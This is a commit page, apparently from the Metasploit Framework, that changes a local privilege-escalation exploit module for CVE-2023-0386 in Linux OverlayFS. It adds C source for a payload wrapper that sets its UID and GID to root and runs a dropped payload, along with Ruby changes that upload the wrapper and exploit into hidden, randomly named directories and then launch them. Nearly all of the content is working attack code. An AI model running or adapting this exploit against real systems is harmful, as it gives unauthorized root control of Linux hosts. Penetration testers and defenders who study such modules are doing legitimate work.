Skip to content

Commit 692531b

Browse files
Takahiro-YokoTakahiro-Yoko
committed
Call payload directory
1 parent 2b63f8b commit 692531b

File tree

3 files changed

+30
-4
lines changed

3 files changed

+30
-4
lines changed

data/exploits/CVE-2023-0386/payload_wrapper.x64.elf

16.5 KB
Binary file not shown.

external/source/exploits/CVE-2023-0386/payload_wrapper.c

Lines changed: 24 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,24 @@
1+
#define _GNU_SOURCE
2+
#include <stdio.h>
3+
#include <stdlib.h>
4+
#include <string.h>
5+
#include <unistd.h>
6+
7+
int main(int argc, char const *argv[]) {
8+
char cwd[500];
9+
if (getcwd(cwd, sizeof(cwd)) == NULL) {
10+
perror("getcwd() error");
11+
return 1;
12+
}
13+
if (setuid(0) < 0) {
14+
perror("setuid");
15+
return -1;
16+
}
17+
18+
if (setgid(0) < 0) {
19+
perror("setgid");
20+
return -1;
21+
}
22+
system(strcat(cwd, "/payload"));
23+
return 0;
24+
}

modules/exploits/linux/local/cve_2023_0386_overlayfs_priv_esc.rb

Lines changed: 6 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -112,27 +112,28 @@ def exploit
112112
# Upload exploit executable
113113
exploit_dir = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
114114
exploit_path = "#{exploit_dir}/.#{rand_text_alphanumeric(5..10)}"
115+
payload_wrapper_path = "#{exploit_dir}/.#{rand_text_alphanumeric(5..10)}"
115116

116117
mkdir(exploit_dir)
117118
register_dir_for_cleanup(exploit_dir)
118119

119120
if live_compile?
120121
vprint_status('Live compiling exploit on system...')
121122
upload_and_compile(exploit_path, strip_comments(exploit_source('CVE-2023-0386', 'cve_2023_0386.c')), '-D_FILE_OFFSET_BITS=64 -lfuse -ldl -pthread')
123+
upload_and_compile(payload_wrapper_path, strip_comments(exploit_source('CVE-2023-0386', 'payload_wrapper.c')))
122124
else
123125
vprint_status('Dropping pre-compiled exploit on system...')
124126
upload_and_chmodx(exploit_path, exploit_data('CVE-2023-0386', 'cve_2023_0386.x64.elf'))
127+
upload_and_chmodx(payload_wrapper_path, exploit_data('CVE-2023-0386', 'payload_wrapper.x64.elf'))
125128
end
126129

127130
# Upload payload executable
128-
payload_path = "#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}"
131+
payload_path = "#{exploit_dir}/payload"
129132
upload_and_chmodx(payload_path, generate_payload_exe)
130-
# register payload for automatic cleanup
131-
register_file_for_cleanup(payload_path)
132133

133134
# Launch exploit
134135
print_status('Launching exploit...')
135-
cmd_string = "#{exploit_path} #{payload_path} #{exploit_dir}/.#{rand_text_alphanumeric(5..10)}"
136+
cmd_string = "#{exploit_path} #{payload_wrapper_path} #{exploit_dir}/.#{rand_text_alphanumeric(5..10)}"
136137
vprint_status("Running: #{cmd_string}")
137138
begin
138139
output = cmd_exec(cmd_string, nil, datastore['TIMEOUT'])
@@ -145,4 +146,5 @@ def exploit
145146
cmd_exec("rm -rf '#{exploit_dir}'")
146147
end
147148
end
149+
148150
end

0 commit comments

Comments
 (0)